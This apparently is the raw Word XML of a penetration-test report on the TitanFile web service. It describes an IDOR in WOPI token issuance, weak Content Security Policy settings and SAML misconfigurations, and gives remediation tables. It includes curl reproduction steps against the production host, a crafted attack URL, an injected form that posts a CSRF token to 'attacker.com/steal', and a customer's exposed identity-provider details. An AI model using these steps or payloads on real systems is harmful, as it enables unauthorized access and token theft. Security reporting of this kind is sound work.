        <w:t>const _uuid: string = matches[2];    // File UUID from URL - user-controlled</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Token request with only the UUID as identifier</w:t>
        <w:br/>
        <w:t>token: await getAccessToken({ wopiFile: _uuid })</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The access token response type reveals the full scope:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>type MsWopiAccessToken = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    access_token: string;        // Bearer token for WOPI operations</w:t>
        <w:br/>
        <w:t xml:space="preserve">    access_token_ttl: number;    // Token lifetime</w:t>
        <w:br/>
        <w:t xml:space="preserve">    file: MsWopiFile;            // File metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve">    permissions: string[];       // Granted permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">    can_view: boolean;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    can_edit: boolean;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>File IDs follow discoverable patterns from files/models.js: fr_&lt;uuid&gt; for regular files, mfr_&lt;uuid&gt; for multi-file revisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step-by-Step Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:t>Confirm source code reveals the IDOR pattern:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s "https://app.titanfile.com/static/js/ms365/host-action-dialog.tsx" | grep -n "getAccessToken\|wopiFile\|_uuid"</w:t>
        <w:br/>
        <w:t>107:    const _uuid: string = matches[2];</w:t>
        <w:br/>
        <w:t>112:        token: await getAccessToken({ wopiFile: _uuid })</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:t>Confirm file ID format:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s "https://app.titanfile.com/static/js/files/models.js" | grep "fr_uuid\|mfr_uuid"</w:t>
        <w:br/>
        <w:t># Reveals fr_&lt;uuid&gt; and mfr_&lt;uuid&gt; patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:t>Attack URL format: /channels/&lt;channel-id&gt;/ms365/?edit=&lt;target-file-uuid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Attack scenario via crafted URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>// Attacker crafts URL to request WOPI token for another user's file:</w:t>
        <w:br/>
        <w:t>// https://app.titanfile.com/channels/ABC123/ms365/?edit=fr_TARGET-FILE-UUID</w:t>
        <w:br/>
        <w:br/>
        <w:t>// The component extracts UUID from URL and calls:</w:t>
        <w:br/>
        <w:t>// getAccessToken({ wopiFile: "fr_TARGET-FILE-UUID" })</w:t>
        <w:br/>
        <w:br/>
        <w:t>// If server doesn't validate ownership, response contains:</w:t>
        <w:br/>
        <w:t>// { access_token: "eyJ...", can_view: true, can_edit: true, ... }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>CODE:$ curl -s "https://app.titanfile.com/static/js/ms365/host-action-dialog.tsx" | grep -n "getAccessToken\|wopiFile\|_uuid\|access_token"</w:t>
        <w:br/>
        <w:t>13:import {getAccessToken, editFile} from '../ms365-utils.tsx';</w:t>
        <w:br/>
        <w:t>29:  access_token: string;</w:t>
        <w:br/>
        <w:t>30:  access_token_ttl: number;</w:t>
        <w:br/>
        <w:t>107:    const _uuid: string = matches[2];</w:t>
        <w:br/>
        <w:t>112:        token: await getAccessToken({ wopiFile: _uuid })</w:t>
        <w:br/>
        <w:t>165:            editFile({ channel, model: file, access_token: accessToken });</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File access validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server validates user has access before issuing WOPI token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Client sends file UUID from URL; no client-side validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Token scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Token scoped to files user has explicit access to</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Token issued based solely on file UUID provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitability: MEDIUM — Requires knowledge of target file UUID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Impact: HIGH — View/edit any document in the system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Complexity: LOW — Simple URL crafting</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Server-side validation in getAccessToken: verify requesting user has access to the file</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Add channel membership verification before issuing WOPI tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Audit logging for all WOPI token issuance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-639: Authorization Bypass Through User-Controlled Key — https://cwe.mitre.org/data/definitions/639.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP IDOR Prevention Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-005: Content Security Policy Misconfiguration Enabling Universal XSS Exploitation on Authenticated Pages</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7.6 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)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CWE-693 (Protection Mechanism Failure)</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A05:2021 — Security Misconfiguration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 (all authenticated pages)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Content-Security-Policy HTTP response header</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CSP on authenticated pages includes both unsafe-inline and unsafe-eval in the script-src directive, completely negating XSS protection. The login page uses proper nonce-based CSP, proving the team knows how to implement it correctly — but authenticated pages where sensitive data is processed have the weakened policy. Additional issues: default-src includes *.titanfile.qa (QA environment) and form-action uses wildcard *.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 7.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Authenticated pages: script-src 'self' js.stripe.com *.google.com *.gstatic.com appsforoffice.microsoft.com ajax.aspnetcdn.com *.pendo.io *.zuora.com 'unsafe-inline' 'unsafe-eval'</w:t>
        <w:br/>
        <w:br/>
        <w:t>Login page: script-src 'self' js.stripe.com *.google.com *.gstatic.com appsforoffice.microsoft.com ajax.aspnetcdn.com *.pendo.io 'nonce-M/uqzeL5EXLSnJK52tS2Cg=='</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curl -sI "https://app.titanfile.com/" | grep "script-src"</w:t>
        <w:br/>
        <w:t>script-src 'self' ... 'unsafe-inline' 'unsafe-eval'</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -sI "https://app.titanfile.com/login/" | grep "script-src"</w:t>
        <w:br/>
        <w:t>script-src 'self' ... 'nonce-+vCgcpsVEe6k8Rj/Bqrvew=='</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -sI "https://app.titanfile.com/" | grep "script-src"</w:t>
        <w:br/>
        <w:t>script-src 'self' ... 'unsafe-inline' 'unsafe-eval'</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -sI "https://app.titanfile.com/login/" | grep "script-src"</w:t>
        <w:br/>
        <w:t>script-src 'self' ... 'nonce-+vCgcpsVEe6k8Rj/Bqrvew=='</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script-src directive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Nonce-based (matching login page)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>unsafe-inline + unsafe-eval — no XSS protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>default-src</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Production domains only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Includes *.titanfile.qa (QA environment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 7.6)</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Remove unsafe-inline and unsafe-eval from authenticated page CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Apply nonce-based CSP from login page to all pages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</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Remove *.titanfile.qa from production CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-693: Protection Mechanism Failure — https://cwe.mitre.org/data/definitions/693.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP CSP Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-006: CSP form-action Wildcard Allows Arbitrary Form Data Exfiltration</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7.4 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N)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CWE-1021 (Improper Restriction of Rendered UI Layers)</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A05:2021 — Security Misconfiguration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 (all pages)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CSP form-action directive</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Content-Security-Policy on all pages includes form-action 'self' *. The wildcard * allows HTML forms to submit data to any external domain. Combined with HTML injection points, an attacker can exfiltrate CSRF tokens, user-submitted data, and authentication tokens to an attacker-controlled server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 7.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CSP header contains: form-action 'self' *</w:t>
        <w:br/>
        <w:br/>
        <w:t>This allows any form on the page to submit to any origin. Combined with HTML injection (VULN-010), an attacker can inject forms that exfiltrate data cross-origin.</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&lt;!-- Injected via any HTML injection point --&gt;</w:t>
        <w:br/>
        <w:t>&lt;form action="https://attacker.com/steal" method="POST"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="csrf" id="csrf-steal"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input type="submit" value="Click to continue"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  document.getElementById('csrf-steal').value = djangoVars.csrfToken;</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>&lt;!-- Injected via any HTML injection point --&gt;</w:t>
        <w:br/>
        <w:t>&lt;form action="https://attacker.com/steal" method="POST"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input type="hidden" name="csrf" id="csrf-steal"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input type="submit" value="Click to continue"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  document.getElementById('csrf-steal').value = djangoVars.csrfToken;</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;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form-action directive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>form-action 'self' (same-origin only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>form-action 'self' * (any domain allowed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 7.4)</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Change form-action 'self' * to form-action 'self'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-1021 — https://cwe.mitre.org/data/definitions/1021.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CSP form-action directive (MDN) — https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/form-action</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-007: SAML Authentication Bypass via Unsigned AuthnRequests and Wildcard DNS</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7.5 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N)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CWE-345 (Insufficient Verification of Data Authenticity), CWE-287 (Improper Authentication)</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A07:2021 — Identification and Authentication Failures</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https://*.titanfile.com/saml2/metadata/</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SAML 2.0 Service Provider implementation</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TitanFile's SAML 2.0 SP has three compounding weaknesses: (1) AuthnRequestsSigned="false" — requests are not signed, (2) validUntil="" — metadata never expires, (3) ACS URL dynamically generated per wildcard subdomain. An attacker can craft a SAML AuthnRequest with a modified AssertionConsumerServiceURL. Since requests are unsigned, the IdP cannot verify the ACS URL is legitimate. Additionally, Gowling WLG Canada's ADFS IdP URL uses HTTP (not HTTPS), and Azure AD Tenant ID e47efd1d-32f2-4a84-93b3-5d6c888ee46e is exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 7.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SAML metadata on any fabricated subdomain returns:</w:t>
        <w:br/>
        <w:br/>
        <w:t>AuthnRequestsSigned="false"</w:t>
        <w:br/>
        <w:t>validUntil=""</w:t>
        <w:br/>
        <w:t>AssertionConsumerService Location="https://&lt;any-subdomain&gt;.titanfile.com/saml2/acs/"</w:t>
        <w:br/>
        <w:br/>
        <w:t>IdP URLs exposed on tenant login pages:</w:t>
        <w:br/>
        <w:t>- http://adfs.ca.gowlingwlg.com/adfs/services/trust (HTTP!)</w:t>
        <w:br/>
        <w:t>- https://sts.windows.net/e47efd1d-32f2-4a84-93b3-5d6c888ee46e/</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curl -s "https://attacker-controlled-999.titanfile.com/saml2/metadata/"</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;?xml version='1.0' encoding='UTF-8'?&gt;</w:t>
        <w:br/>
        <w:t>&lt;EntityDescriptor entityID="https://attacker-controlled-999.titanfile.com/saml2/metadata/"</w:t>
        <w:br/>
        <w:t xml:space="preserve">                  validUntil=""&gt;</w:t>
        <w:br/>
